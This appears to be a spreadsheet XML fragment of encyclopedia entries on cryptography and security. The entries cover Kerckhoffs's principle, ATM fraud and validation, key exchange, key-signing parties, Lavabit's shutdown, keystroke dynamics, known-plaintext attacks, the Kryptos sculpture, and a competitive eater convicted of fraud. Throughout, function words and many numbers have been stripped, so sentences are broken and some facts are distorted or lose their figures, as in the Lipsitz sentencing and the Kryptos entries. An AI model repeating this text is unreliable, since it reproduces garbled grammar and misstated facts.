companies, sometimes even standards bodies case encryption dvds, keep inner workings system secret. some argue "security obscurity" makes product safer less vulnerable attack. counter-argument keeping innards secret improve security short term, long run, systems published analyzed trusted. steven bellovin randy bush commented: security through obscurity considered dangerous hiding security vulnerabilities algorithms, software, and/or hardware decreases likelihood repaired increases likelihood exploited. discouraging outlawing discussion weaknesses vulnerabilities extremely dangerous deleterious security computer systems, network, citizens. open discussion encourages better security long history cryptography cryptoanalysis shown time time open discussion analysis algorithms exposes weaknesses thought original authors, thereby leads better secure algorithms. kerckhoffs noted cipher systems 1883 [kerc83], faut qu'il n'exige secret, qu'il puisse sans inconvénient tomber entre mains l'ennemi." (roughly, "the system must require secrecy must able stolen enemy without causing trouble.") notes references this article incorporates material citizendium article "kerckhoffs' principle", licensed creative commons attribution-sharealike unported license gfdl. external links john savard article discussing kerckhoffs's design goals ciphers reference kerckhoffs's original paper, scanned original text</t>
  </si>
  <si>
    <t>Kevin Lipsitz</t>
  </si>
  <si>
    <t>"krazy" kevin lipsitz competitive eater staten island, york, affiliated ifoce, international federation competitive eating. known bear charismatic eating style, lipsitz competed events across country, appeared gutbusters television special, aired discovery channel 2002. former american pickle eating champion.in 1997, lipsitz convicted fraud charges york, stemming spamming usenet newsgroups advertisements using aol.com "reply-to:" address. resumed spamming 1999.in october 2021, lipsitz pleaded guilty mail fraud connection sale large quantities personal protective equipment (ppe) beginning covid-19 pandemic. lipsitz convicted days jail, three years post-release supervision, $5,000 fine $90,000 restitution. references external links ifoce profile major league eaters profile lipsitz please guilty mail fraud</t>
  </si>
  <si>
    <t>Security of automated teller machines</t>
  </si>
  <si>
    <t>automated teller machines (atms) targets fraud, robberies security breaches. past, main purpose atms deliver cash form banknotes, debit corresponding bank account. however, atms becoming complicated serve numerous functions, thus becoming high priority target robbers hackers. introduction modern atms implemented high-security protection measures. they work complex systems networks perform transactions. data processed atms usually encrypted, hackers employ discreet hacking devices hack accounts withdraw account's balance. alternative, unskilled robbers threaten bank patrons weapon loot withdrawn money account. methods looting atms vandals either physically tamper obtain cash, employ credit card skimming methods acquire control user's credit card account. credit card fraud done inserting discreet skimming devices keypad credit card reader. alternative credit card fraud identify directly devices cameras concealed near keypad. security measures atms validation schemes local transactions on-line validation validation on-line occurs terminal question connected central database. supplied customer always compared recorded reference financial institutions. however, disadvantage malfunction network renders unusable fixed. off-line validation off-line validation, connected central database. condition off-line validation able compare customer's entered reference. terminal must able perform cryptographic operations must required encryption keys disposal. offline validation scheme extremely slow inefficient. offline validation obsolete, atms connected central server protected networks. validation interchange transactions there three procedures operation high-security interchange transaction. supplied encrypted entry terminal, step, secret cryptographic used. addition transaction elements, encrypted transmitted acquirer's system. then, encrypted routed acquirer's system hardware security module. within decrypted. with cryptographic used interchange, decrypted immediately re-encrypted routed issuer's system normal communications channels. lastly, routed decrypted issuer's security module validated basis techniques on-line local validation. shared atms there different transaction methods used shared atms regards encipherment pin, message authentication among so-called "zone encryption". method, trusted authority appointed operate behalf group banks could interchange messages payment approvals. hardware security module successful communication banks atms, incorporation cryptographic module, usually called security module critical component maintaining proper connections banks machines. security module designed tamper resistant. security module performs plethora functions, among verification, translation interchange, management message authentication. interchanges causing concerns security translated security module format used interchange. moreover, security module generate, protect maintaining keys associated user's network. authentication data integrity personal verification process begins user's supply personal verification information. this information includes provided customer's information recorded bank account. cases storage cryptographic bank card, called personal (pk). personal identification processes done authentication parameter (ap). capable operating ways. first option time-invariant. second option time-variant. there case based time-variant information transaction request message. case used message authentication code (mac), message authentication made recourse find stale bogus messages might routed communication path detection modified messages fraudulent traverse non-secure communication systems. cases, serves purposes. security security breaches electronic funds transfer systems done without delimiting components. electronic funds transfer systems three components; communication links, computers, terminals (atms). first, communication links prone attacks. data exposed passive means direct means device inserted retrieve data. second component computer security. there different techniques used acquire access computer accessing remote terminal peripheral devices card reader. hacker gained unauthorized access system, programs data manipulated altered hacker. terminal security significant component cases cipher keys reside terminals. absence physical security, abuser probe substitutes value. also atmia (atm industry association) references external links https://www.lightbluetouchpaper.org/ security research, computer laboratory university cambridge</t>
  </si>
  <si>
    <t>Key exchange</t>
  </si>
  <si>
    <t>exchange (also establishment) method cryptography cryptographic keys exchanged parties, allowing cryptographic algorithm. sender receiver wish exchange encrypted messages, must equipped encrypt messages sent decrypt messages received. nature equipping require depends encryption technique might use. code, require copy codebook. cipher, need appropriate keys. cipher symmetric cipher, need copy key. asymmetric cipher public/private property, need other's public key. channel exchange exchange done either in-band out-of-band. exchange problem exchange problem describes ways exchange whatever keys information needed establishing secure communication channel else obtain copy. historically, invention public-key cryptography (asymmetrical cryptography), symmetric-key cryptography utilized single encrypt decrypt messages. parties communicate confidentially, must first exchange secret party able encrypt messages sending, decrypt received ones. this process known exchange. overarching problem symmetrical cryptography, single-key cryptography, requires secret communicated trusted couriers, diplomatic bags, secure communication channel. parties cannot establish secure initial exchange, able communicate securely without risk messages intercepted decrypted third party acquired initial exchange. public-key cryptography uses two-key system, consisting public private keys, messages encrypted decrypted another. depends selected cryptographic algorithm key—public private—is used encrypting messages, decrypting. example, rsa, private used decrypting messages, digital signature algorithm (dsa), private used authenticating them. public sent non-secure channels shared public; private available owner. known diffie-hellman exchange, encryption openly communicated poses risk confidentiality encrypted messages. party exchanges keys another party encrypt messages using send back cipher text. only decryption key—in case, private key—can decrypt message. time diffie-hellman exchange sensitive information risk compromise, opposed symmetrical exchange. identification principle, remaining problem sure least confident) public actually belonged supposed owner. because possible 'spoof' another's identity several ways, trivial easily solved problem, particularly users involved never know nothing other. diffie–hellman exchange 1976, whitfield diffie martin hellman published cryptographic protocol called diffie–hellman exchange (d–h) based concepts developed hellman's student ralph merkle. protocol enables users securely exchange secret keys even opponent monitoring communication channel. exchange protocol, however, address authentication (i.e. problem sure actual identity person 'entity' communication channel). authentication crucial opponent monitor alter messages within communication channel (aka man-in-the-middle mitm attacks) addressed fourth section paper. public infrastructure public infrastructures (pkis) proposed workaround problem identity authentication. usual implementation, user applies “certificate authority” (ca), trusted parties, digital certificate serves users non-tamperable authentication identity. infrastructure safe, unless compromised. case though, many pkis provide revoke certificates users trust them. revoked certificates usually certificate revocation lists certificate matched against. several countries jurisdictions passed legislation issued regulations encouraging pkis giving (more less) legal effect digital certificates (see digital signature). many commercial firms, well government departments, established certificate authorities. this nothing solve problem though, trustworthiness still guaranteed particular individual. form argument authority fallacy. actual trustworthiness, personal verification certificate belongs establishment trust required. this usually possible. there known cases authoritarian governments proposed establishing so-called “national cas” whose certificates would mandatory install citizens’ devices and, installed trusted, could used monitoring, intercepting, modifying, blocking encrypted internet traffic.for things, arrangements best thought electronic notary endorsements “this public belongs user”. notary endorsements, mistakes misunderstandings vouchings. additionally, notary untrusted. there several high-profile public failures assorted certificate authorities. trust conceptual range trust system, avoids central certificate authorities entirely. each user responsible getting certificate another user using certificate communicate user. implementation openpgp internet standard) employ trust mechanism. password-authenticated agreement password-authenticated agreement algorithms perform cryptographic exchange utilizing knowledge user's password. quantum exchange quantum distribution exploits certain properties quantum physics ensure security. relies fact observations measurements) quantum state introduces perturbations state. over many systems, perturbations detectable noise receiver, making possible detect man-in-the-middle attacks. beside correctness completeness quantum mechanics, protocol assumes availability authenticated channel alice bob. also (cryptography) management diffie–hellman exchange elliptic-curve diffie–hellman forward secrecy references possibility non-secret digital encryption ellis, january 1970. non-secret encryption using finite field williamson, january 1974. thoughts cheaper non-secret encryption williamson, august 1976. directions cryptography diffie hellman, ieee transactions information theory, vol. it-22, nov. 1976, 644–654. cryptographic apparatus method martin hellman, bailey diffie, ralph merkle, u.s. patent #4,200,770, april 1980 first years public-key cryptography whitfield diffie, proceedings ieee, vol. 1988, 560–577 (1.9mb file) menezes, alfred; oorschot, paul; vanstone, scott (1997). handbook applied cryptography boca raton, florida: press. isbn 0-8493-8523-7. (available online) singh, simon (1999) code book: evolution secrecy mary queen scots quantum cryptography york: doubleday isbn 0-385-49531-5cambodia</t>
  </si>
  <si>
    <t>Key ring file</t>
  </si>
  <si>
    <t>ring file contains multiple public keys certificate authority (ca). ring file necessary secure sockets layer (ssl) connection web. securely stored server hosts website. contains public/private pair particular website. also contains public/private pairs various certificate authorities trusted root certificate various certification authorities. entity website administrator send certificate signing request (csr) returns signed certificate entity. this certificate received stored ring. references joseph steinberg, speed, vpn: understanding, evaluating, planning secure, web-based remote access, packt publishing ltd, 2005 isbn 1847190014.</t>
  </si>
  <si>
    <t>Key signing party</t>
  </si>
  <si>
    <t>public-key cryptography, signing party event people present public keys others person, who, confident actually belongs person claims digitally sign certificate containing public person's name, etc. signing parties common within privacy guard community, public infrastructure depend central certifying authority, distributed trust approach. signing parties strengthen trust. participants signing party expected present adequate identity documents.although keys generally used personal computers internet-related applications, signing parties generally involve computers, since would give adversaries increased opportunities subterfuge. rather, participants write string letters numbers, called public fingerprint, represents key. fingerprint created cryptographic hash function, condenses public string shorter manageable. participants exchange fingerprints verify other's identification. then, party, obtain public keys corresponding fingerprints received digitally sign them. also zimmermann–sassaman key-signing protocol trust cryptoparty references external links pius: sign entire keyrings send encrypted emails automatically keysigning party howto biglumber keysigning coordination website debian wiki: keysigning practical guidance debian developers</t>
  </si>
  <si>
    <t>Key-based routing</t>
  </si>
  <si>
    <t>key-based routing (kbr) lookup method used conjunction distributed hash tables (dhts) certain overlay networks. while dhts provide method find host responsible certain piece data, provides method find closest host data, according defined metric. this necessarily defined physical distance, rather number network hops. key-based routing networks freenet gnunet kademlia onion routing garlic routing also public-key cryptography distributed hash table overlay network anonymous references</t>
  </si>
  <si>
    <t>Keysigning</t>
  </si>
  <si>
    <t>keysigning process digitally signing someone else's public using one's own. correct term would certificate signing, since actual material changed process signing. however, community customary distinguish speaking someone's certificate, term keysigning used. (the term refers implementations openpgp standard, gnupg.) users sign another's keys indicate third party signer trusts signee. this enables someone trusts signer extend trust signee well. way, trust built. users often organize signing parties, many people meet person verify other's identity using printed certificate identity sign other's keys. also signing party external links keysigning party howto</t>
  </si>
  <si>
    <t>Lavabit</t>
  </si>
  <si>
    <t>lavabit open-source encrypted webmail service, founded 2004. service suspended operations august 2013 u.s. federal government ordered turn secure sockets layer (ssl) private keys, order allow government edward snowden's email.lavabit's owner operator, ladar levison, announced january 2017 lavabit would start operating again, using dark internet mail environment (dime), end-to-end email encryption platform designed surveillance-resistant. however, june 2017, dime transition completed, service offered past customers took advantage early signup offer. october 2017, ability customers purchase service offered. history lavabit founded texas-based programmers formed nerdshack llc, renamed lavabit next year, cited privacy concerns gmail, google's free, widely used email service, content users' email generate advertisements marketing data. lavabit offered significant privacy protection users' email, including asymmetric encryption. strength cryptographic methods used level presumed impossible even intelligence agencies crack. august 2013, lavabit 410,000 users offered free paid accounts levels storage ranging megabytes gigabytes. january 2011, lavabit launched shared hosting service.before snowden incident, lavabit complied previous search warrants. example, june 2013 search warrant executed lavabit account suspected possession child pornography. connection edward snowden lavabit received media attention july 2013 revealed edward snowden using lavabit email address ed_snowden@lavabit.com invite human rights lawyers activists press conference confinement sheremetyevo international airport moscow. snowden revealed identity, united states federal government served court order, dated june 2013, issued 2703(d), 1994 amendment stored communications act, asking metadata customer unnamed. kevin poulsen wired wrote "the timing circumstances suggest" snowden customer. july 2013 federal government obtained search warrant demanding lavabit give away private keys service affecting lavabit users. 2016 redaction error confirmed edward snowden target. suspension order august 2013, lavabit suspended operations, email service log-in page replaced message owner operator ladar levison. yorker suggested suspension might related national security agency (nsa)'s "domestic-surveillance practices". wired speculated levison fighting warrant national security letter seeking customer information extraordinary circumstances, lavabit complied least routine search warrant past. levison stated interview responded least dozen subpoenas" lifetime service. hinted objectionable request "information users" lavabit.levison explained order legally unable explain public ended service. instead, asked donations "fight constitution" united states court appeals fourth circuit. levison also stated even barred sharing information lawyer. meanwhile, electronic frontier foundation called federal bureau investigation (fbi) provide greater transparency public, part help observers "understand ten-year-old business closing doors start-up abandoning business opportunity".levison said could arrested closing site instead releasing information, reported federal prosecutor's office sent levison's lawyer email effect.lavabit believed first technology firm chosen suspend shut operation rather comply order united states government reveal information grant access information. silent circle, encrypted email, mobile video voice service provider, followed example lavabit discontinuing encrypted email services. citing impossibility able maintain confidentiality customers' emails served government orders, silent circle permanently erased encryption keys allowed access emails stored transmitted service. september 2013 levison appealed order resulted closing website.levison lawyer made requests judge claude hilton unseal records, denied. they also launched appeals case regarding legality original warrant. appeals court requested records unsealed, judge hilton granted request. october 2013, federal district court alexandria, virginia unsealed records case, censored name detail target search order. wired suggested target likely snowden. court records show sought lavabit's transport layer security (tls/ssl) private key. levison objected, saying would allow government access communications 400,000 customers lavabit. also offered code servers would provide information required target order. court rejected offer would require government trust levison stated government could access customers' communication mean would legally permitted lavabit ordered provide machine readable format noon, august face fine $5000 day. levison closed lavabit days later. october 2013, levison announced would allow lavabit users change passwords october 2013, could download archive emails personal data.the court documents stated july levison sent open letter assistant attorney, offering give email metadata (without email content, usernames passwords) paid $2,000 cover cost development time equipment necessary implement solution" $1,500 give data "intermittently collection period".afterwards, levison wrote contacted fbi, subpoenaed appear federal court, forced appear without legal representation served short notice; addition, third party, right representation, allowed anyone attorney help find one. also wrote addition denied hearing warrant obtain lavabit's user information, held contempt court. appellate court denied appeal objection, however, wrote hearing, objection could raised. contempt court charge also upheld ground disputed; similarly, unable dispute charge hearing also wrote "the government argued that, since 'inspection' data carried machine, exempt normal search-and-seizure protections fourth amendment." legacy year suspension lavabit, founder ladar levison announced specification dark internet mail environment (dime) development dark mail alliance.in april 2014, contempt court conviction providing printout upheld appeals court, described initiative technica technological solution would take decision away man."in november 2015, levison said work dime still progressing, although slower would like. july 2016, posts dark mail alliance forum suggest collaborators left project ladar working dime alone. relaunch january 2017, lavabit owner ladar levison relaunched service. wording announcement, date apparently timed coincide inauguration donald trump (though mentioned name). service revamped dark internet mail environment protocols software ladar working past years. this dime platform, associated magma open source email server, designed end-to-end email encryption operating highest security settings, subpoenas cannot force service providers give governments access customer email forced shut order avoid this). when using maximum security settings, even attacker breaking dime servers would feasible access customer emails, leaving client-side attacks likely potential points vulnerability. also comparison mail servers comparison webmail providers references external links official website lavabit's ladar levison: knew what know about email, might forbes, august 2013. ladar levison interviewed show triangulation twit.tv network, october 2013 interview ladar levison news, january 2014. lavabit founder: gov’t "bold-faced lies" mass surveillance effort forced close company democracy now! 2014/5/22</t>
  </si>
  <si>
    <t>Keystroke dynamics</t>
  </si>
  <si>
    <t>keystroke dynamics,, keystroke biometrics, typing dynamics typing biometrics refer detailed timing information describes pressed released person typing computer keyboard. science behavioural biometric keystroke dynamics uses manner rhythm individual types characters keyboard keypad. keystroke rhythms user measured develop unique biometric template user's typing pattern future authentication. keystrokes separated static dynamic typing, used help distinguish authorized unauthorized users. vibration information used create pattern future identification authentication tasks. data needed analyse keystroke dynamics obtained keystroke logging. normally, retained logging typing session sequence characters corresponding order keys pressed. timing information discarded. example, reading email, receiver cannot tell reading phrase zebras!" whether: typed rapidly slowly, sender used left shift key, right shift key, caps-lock make turn capitalized letter "i," letters typed pace, long pause characters looking key, sender typed letters wrong initially went back corrected them, right first time. history during late nineteenth century, telegram operators began develop unique "signatures" could identified simply tapping rhythm. late world military transmitted messages morse code. using methodology called "the fist sender," military intelligence identified individual unique keying message's "dots" "dashes", creating rhythm could help distinguish ally enemy. biometric data keystroke dynamic information could used verify even determine identity person producing keystrokes. techniques used vary widely sophistication, range statistical techniques artificial intelligence (ai) approaches like neural networks. time seek depress (seek-time), time held-down (hold-time) characteristic person, regardless fast typing overall. most people specific letters take longer find average seek-time letters. which letters vary dramatically consistently different people. right-handed people statistically faster getting keys right-hand fingers left-hand fingers. index fingers characteristically faster fingers consistent person regardless overall speed day. addition, sequences letters characteristic properties person. english, word "the" common, three letters known rapid-fire sequence three meaningless letters order. common endings, "ing", entered faster than, say, letters reverse order ("gni") degree varies consistently person. this consistency hold reveal person's native language's common sequences even writing entirely different language, revealing accent might spoken english. common "errors" also quite characteristic person, entire taxonomy errors, person's common "substitutions", "reversals", "drop-outs", "double-strikes", "adjacent letter hits", "homonyms", hold-length-errors (for shift held short long time). even without knowing language person working looking rest text letters person goes back replaces, errors might detected. again, patterns errors might sufficiently different distinguish people. authentication versus identification keystroke dynamics part larger class biometrics known behavioural biometrics; field observed patterns statistical nature. because inherent uncertainty, commonly held belief behavioural biometrics reliable biometrics used authentication based physically observable characteristics fingerprints retinal scans dna. behavioral biometrics confidence measurement instead traditional pass/fail measurements. such, traditional benchmarks false acceptance rate (far) false rejection rates (frr) longer linear relationships. benefit keystroke dynamics well behavioural biometrics) frr/far adjusted changing acceptance threshold individual level. this allows explicitly defined individual risk mitigation–something physical biometric technologies could achieve. major problems keystroke dynamics runs person's typing varies substantially different days, affected number external factors. because variations, system make false-positive false-negative errors. some successful commercial products strategies handle issues proven effective large-scale real-world settings applications. legal regulatory issues keylogging software direct explicit violation local laws, u.s. patriot act, constitute wire-tapping. this could severe legal penalties. spyware better description user-consent issues various fraud statutes. patents patent 9430626, john rome, bethann rome thomas ketcham "user authentication known text input cadence", issued 2012 patent 7206938, blender postley, "key sequence rhythm recognition system method", issued 2007 patent 4621334, garcia, "personal identification apparatus", issued 1986 patent 4805222, j.r. young r.w. hammon, "method apparatus verifying individual's identity", issued 1989 nordström, johansson. security system method detecting intrusion computerized system. patent 993, european patent office, 2009. patent 8230232, awad traore, "system method determining computer user profile motion-based input device", issued 2012 other uses because keystroke timings generated human beings, well correlated external processes, frequently used source hardware-generated random numbers computer systems. also fist (telegraphy) references other references further reading vaas, lisa july 2015). "websites track type—here's stop it". naked security. sophos. retrieved 2018-02-01. walsh, november 2016). "keyboard privacy: building profiles type". bestvpn. retrieved 2018-02-01.</t>
  </si>
  <si>
    <t>Kiss (cryptanalysis)</t>
  </si>
  <si>
    <t>cryptanalysis, kiss pair identical messages sent using different ciphers, broken. term used bletchley park world deciphered message breakable system provided "crib" (piece known plaintext) could used read unbroken messages. example messages read german meteorological cipher could used provide cribs reading difficult 4-wheel naval enigma cipher. cribs re-encipherments .... known 'kisses' bletchley park parlance relevant signals marked 'xx' also cryptanalysis enigma known-plaintext attack references smith, michael erskine, ralph (editors): action (2001, bantam london) isbn 0-593-04910-1</t>
  </si>
  <si>
    <t>Known-plaintext attack</t>
  </si>
  <si>
    <t>known-plaintext attack (kpa) attack model cryptanalysis attacker access plaintext (called crib), encrypted version (ciphertext). these used reveal secret information secret keys code books. term "crib" originated bletchley park, british world decryption operation, defined as:a plain language code) passage length, usually obtained solving cipher code messages, occurring believed likely occur different cipher code message, provide means solving. history usage "crib" adapted slang term referring cheating (e.g., cribbed answer test paper"). "crib" originally literal interlinear translation foreign-language text—usually latin greek text—that students might assigned translate original language. idea behind crib cryptologists looking incomprehensible ciphertext, clue word phrase might expected ciphertext, would "wedge," test break otherwise random attacks cipher managed sometimes produce words (preferably) phrases, would know might right track. when words phrases appeared, would feed settings used reveal back whole encrypted message good effect. case enigma, german high command meticulous overall security enigma system understood possible problem cribs. day-to-day operators, hand, less careful. bletchley park team would guess plaintext based upon message sent, recognizing routine operational messages. instance, daily weather report transmitted germans time every day. regimented style military reports, would contain word wetter (german "weather") location every message. (knowing local weather conditions helped bletchley park guess parts plaintext well.) other operators, too, would send standard salutations introductions. officer stationed qattara depression consistently reported nothing report. "heil hitler," occurring message, another well-known example.at bletchley park world strenuous efforts made (and even force germans produce) messages known plaintext. example, cribs lacking, bletchley park would sometimes royal force "seed" particular area north mines process came known gardening, obvious reference). enigma messages soon sent would likely contain name area harbour threatened mines.the germans could accommodating regard. whenever turned german double-cross agents sent message (written british) respective handlers, frequently obligingly re-encrypted message word word enigma onward transmission berlin. when captured german revealed interrogation enigma operators instructed encode numbers spelling out, alan turing reviewed decrypted messages determined number "eins" ("one") common string plaintext (benford's law). automated crib process, creating eins catalogue, assumed "eins" encoded positions plaintext. catalogue included every possible position various rotors, starting positions, keysettings enigma.the polish cipher bureau likewise exploited "cribs" "anx method" world (the germans' "an", german "to", followed spacer form text "anx").the united states britain used one-time tape systems, 5-uco, sensitive traffic. these devices immune known-plaintext attack; however, point-to-point links required massive supplies time tapes. networked cipher machines considered vulnerable cribs, various techniques used disguise beginning ends message, including cutting messages half sending second part first adding nonsense padding ends. latter practice resulted infamous incident world nonsense padding added message sent american admiral william halsey jr., "the world wonders", nonsensical enough interpreted part actual message, leading halsey change plans. kl-7, introduced mid-1950s, first u.s. cipher machine considered safe known-plaintext attack.: p.37 classical ciphers typically vulnerable known-plaintext attack. example, caesar cipher solved using single letter corresponding plaintext ciphertext decrypt entirely. general monoalphabetic substitution cipher needs several character pairs guessing fewer distinct pairs. also cadix cryptanalysis enigma kiss (cryptanalysis) bruno polish cipher bureau ultra notes references władysław kozaczuk, enigma: german machine cipher broken, read allies world two, edited translated christopher kasparek, frederick, university publications america, 1984, isbn 0-89093-547-5. marian rejewski, "summary methods reconstructing enigma reconstructing daily keys, german efforts frustrate those methods," appendix władysław kozaczuk, enigma, 1984, 241–45. welchman, gordon (1982), story: breaking enigma codes, harmondsworth: allen lane, isbn 0-7139-1294-4 smith, michael (2006), "how began: bletchley park goes war", copeland, jack (ed.), colossus: secrets bletchley park's codebreaking computers, oxford: oxford university press, isbn 978-0-19-284055-4 geggel, laura. "nazi code-making enigma machine auction". live science. retrieved august 2020.</t>
  </si>
  <si>
    <t>KnujOn</t>
  </si>
  <si>
    <t>knujon ("no junk" spelled backwards, pronounced "new john") project involved internet security. knujon targeted spam root, attacking illicit activities spammers derive revenue from. end, knujon automated spam reporting tool. history knujon founded 2005 garth bruen father robert bruen. multi-purpose software tool called knujon presented northeast chapter high technology crime investigation association (htcia) november 2005. that software, designed filter junk mail produce complaints result shutdowns scam websites, tracked internet-based scams built profiles persons organizations engaged suspicious internet activity gathering sorting large amounts data.knujon.com collected spam samples public, build better filters blacklists, rather illicit site termination, test internet's policy infrastructure, gather important statistics. their general goal target advertised illicit transaction sites hopefully take financial incentive spam cycle. march 2018 service stopped accepting subscriptions email submissions began bouncing. 2018 service shut down. also blue frog references external links knujon.com submit spam</t>
  </si>
  <si>
    <t>Kryha</t>
  </si>
  <si>
    <t>history cryptography, kryha machine device encryption decryption, appearing early 1920s used 1950s. machine invention alexander kryha (born 31.10.1891 charkow, russian empire, committed suicide baden-baden 1955). during second world war, kryha worked officer german wehrmacht. there several versions; standard kryha machine weighed around five kilograms, totally mechanical. scaled pocket version introduced later termed "lilliput" model. there also bulky electrical version. machine used time german diplomatic corps, adopted marconi england. operation machine consisted concentric rings containing alphabet. inner alphabet stepped variable number places pushing lever. operation, user would encrypt finding plaintext letter ring (usually outer ring), reading corresponding letter ring; used ciphertext letter. when lever pressed, inner ring would step, causing relationship alphabets change. stepping irregular governed disk number sectors, containing number teeth. cryptanalysis security machine evaluated mathematician georg hamel, calculated size space. army also contacted would interested using machine, persuaded accept challenge message evaluate security device. challenge message, 1135 characters long, solved william friedman, assisted solomon kullback, frank rowlett abraham sinkov, hours minutes. references alexander kryha, "coding machine", u.s. patent 1,744,347 alan konheim, cryptanalysis kryha machine, eurocrypt 1982, pp49–64. cipher deavours louis kruh, "machine cryptography modern cryptanalysis", artech house, 1985, chapter kryha liliput ciphering machine, cryptologia, ix(3), june 1985. external links jerry proc's pages kryha: standard, electrical lilliput. standard kryha: machine cover open machine cover closed nick gessler's page kryha: photographs</t>
  </si>
  <si>
    <t>Kryptographik</t>
  </si>
  <si>
    <t>kryptographik lehrbuch geheimschreibekunst (cryptology: instruction book secret writing) 1809 book cryptography written johann ludwig klüber.in 2011 national security agency included copy kryptographik, used german cryptographer world part 50,000 page release classified documents. references</t>
  </si>
  <si>
    <t>Kryptos</t>
  </si>
  <si>
    <t>kryptos sculpture american artist sanborn located grounds central intelligence agency (cia) langley, virginia. since dedication november 1990, much speculation meaning four encrypted messages bears. four messages, first three solved, fourth message remains famous unsolved codes world. sculpture continues interest cryptanalysts, amateur professional, attempting decipher fourth passage. artist given four clues passage. description main part sculpture located northwest corner headquarters building courtyard, outside agency's cafeteria. sculpture comprises four large copper plates elements consisting water, wood, plants, green granite, white quartz, petrified wood. prominent feature large vertical s-shaped copper screen resembling scroll piece paper emerging computer printer, half consists encrypted text. characters found within letters latin alphabet, along question marks, copper plates. main sculpture contains four separate enigmatic messages, three deciphered.in addition main part sculpture, sanborn also placed pieces grounds, several large granite slabs sandwiched copper sheets outside entrance headquarters building. several morse code messages found copper sheets, stone slabs engraving compass rose pointing lodestone. other elements sanborn's installation include landscaped garden area, fish pond opposing wooden benches, reflecting pool, pieces stone including triangle-shaped black stone slab. name kryptos comes ancient greek word "hidden", theme sculpture "intelligence gathering". cost sculpture 1988 $250,000 (worth $501,000 2016). encrypted messages ciphertext left-hand side sculpture seen courtyard) main sculpture contains characters total: letters question marks. april 2006, however, sanborn released information stating letter omitted side kryptos "for aesthetic reasons, keep sculpture visually balanced".there also three misspelled words plaintext deciphered first three passages, sanborn said intentional, three letters (yar) near beginning bottom half left side characters sculpture superscript. right-hand side sculpture comprises keyed vigenère encryption tableau, consisting letters. lines vigenère tableau extra character (l). bauer, link, molle suggest reference hill cipher encryption method fourth passage sculpture. however, sanborn omitted extra letter small kryptos models sold. sanborn worked retiring employee named scheidt, chairman office communications, come cryptographic systems used sculpture.sanborn revealed sculpture contains riddle within riddle, solvable four encrypted passages deciphered.he given conflicting information sculpture's answer, saying time gave complete solution then-cia director william webster dedication ceremony; later, also said given webster entire solution. did, however, confirm passage plaintext second message reads "who knows exact location? only ww." sanborn also confirmed entire sculpture becomes deciphered, someone able confirm solution. 2020, sanborn stated planned secret solution auction dies. solvers first person announce publicly solved first three passages gillogly, computer scientist southern california, deciphered passages using computer, revealed solutions 1999.after gillogly's announcement, revealed analyst david stein solved passages 1998 using pencil paper techniques, although time solution information disseminated within intelligence community. public announcement made july 1999, although november 1998 revealed analyst working time [had] solved lion's share it".the also claimed employees solved three passages, would reveal names dates march 2000, learned team miller, along dennis mcdaniels unnamed individuals, solved passages late 1992.in 2013, response freedom information request elonka dunin, released documents show became involved attempts solve kryptos puzzle 1992, following challenge bill studeman, deputy director cia. documents show june 1993, small group cryptanalysts succeeded solving first three passages sculpture.the attempts solve kryptos found passage ended westidbyrows. 2005, nicole friedrich, logician vancouver, canada, determined another possible plaintext was: westplayertwo.dr friedrich solved ending section clue became apparent determined running cipher resulted incomplete partially legible plaintext, involving text xpist, realize, others, find instigated discovery plaintext clue westx. april 2006, sanborn contacted online community dedicated kryptos puzzle inform accepted solution passage incorrect. sanborn said made error sculpture omitting ciphertext, plaintext, confirmed last passage plaintext westxlayertwo, westidbyrows. solutions following solutions passages sculpture.misspellings present text included verbatim. solution passage method: vigenère keywords: kryptos, palimpsest between subtle shading absence light lies nuance iqlusion iqlusion intentional misspelling illusion. solution passage method: vigenère keywords: kryptos, abscissa totally invisible hows that possible they used earths magnetic field information gathered transmitted undergruund unknown location does langley know about this they should buried there somewhere knows exact location only this last message thirty eight degrees fifty seven minutes point five seconds north seventy seven degrees eight minutes forty four seconds west layer coordinates mentioned plaintext, 38°57′6.5″n 77°8′44″w, interpreted using modern geodetic datum indicating point approximately feet meters) southeast sculpture. solution passage method: transposition slowly desparatly slowly remains passage debris that encumbered lower part doorway removed with trembling hands made tiny breach upper left hand corner then widening hole little inserted candle peered escaping from chamber caused flame flicker presently details room within emerged from mist anything this paraphrased quotation howard carter's account opening tomb tutankhamun november 1922, described 1923 book tomb tutankhamun. question ends asked lord carnarvon, carter book) famously replied "wonderful things". november 1922, field notes, however, reply was, "yes, wonderful". clues given passage when commenting 2006 error passage sanborn said answers first three passages contain clues fourth passage. november 2010, sanborn released clue, publicly stating "nypvtt", 64th–⁠69th letters passage four, become "berlin" decryption.sanborn gave york times another clue november 2014: letters "mzfpk", 70th–⁠74th letters passage four, become "clock" decryption. 74th letter plaintext ciphertext, meaning possible character encrypt itself. this means weakness, character could never encrypted itself, known inherent german enigma machine. sanborn stated order solve passage "you'd better delve particular clock," added, "there several really interesting clocks berlin." particular clock question presumably berlin clock, although alexanderplatz world clock clock flowing time candidates. article published january 2020, york times, sanborn gave another clue: positions 26–34, ciphertext "qqprngkss" word "northeast".in august 2020, sanborn revealed four letters positions 22–25, ciphertext "flrv", plaintext "east". sanborn commented "released layout several people early april". first person known shared hint widely sukhwant singh. related sculptures kryptos first cryptographic sculpture made sanborn. after producing kryptos went make several sculptures codes types writing, including entitled antipodes, hirshhorn museum washington, d.c., "untitled kryptos piece" sold private collector, cyrillic projector, contains encrypted russian cyrillic text included extract classified document. cipher side antipodes repeats text kryptos. much cipher antipodes' side duplicated cyrillic projector. russian portion cipher found cyrillic projector antipodes solved 2003 frank corr mike bales independently translation russian plaintext provided elonka dunin.ex nexum installed 1997 little rock u.s. post office courthouse. some additional sculptures sanborn include native american texts: rippowam installed university connecticut, stamford 1999, installed 2001 post office building fort myers, florida. iacto located university iowa, adler journalism building main library.indian located next u.s. federal courthouse beltsville, maryland, contains bronze cylinder perforated text iroquois book great law. this document includes contribution indigenous peoples united states legal system. text written onondaga transcribed ancient oral tradition five iroquois nations.a,a installed plaza front library university houston, houston, texas, 2004, radiance installed department energy, coast, environment, louisiana state university, baton rouge 2008. popular culture dust jacket version brown's 2003 novel vinci code contains references kryptos—one back cover (coordinates printed light dark red, vertically next blurbs) reference coordinates mentioned plaintext passage (see above), except degrees digit one. when brown publisher asked this, gave reply: "the discrepancy intentional". coordinates part first clue second vinci code webquest, first answer kryptos. reference hidden brown "tear" artwork—upside-down words "only knows", another reference second message kryptos.kryptos features brown's 2009 novel lost symbol.a small version kryptos appears season episode alias "s.o.s.". marshall flinkman, small moment comic relief, says cracked code looking tour visit office. solution describes sounds like solution first parts. season episode king queens "meet by-product", framed picture kryptos hangs wall door. progressive metal band between buried reference kryptos song "obfuscation" 2009 album, great misdirect. 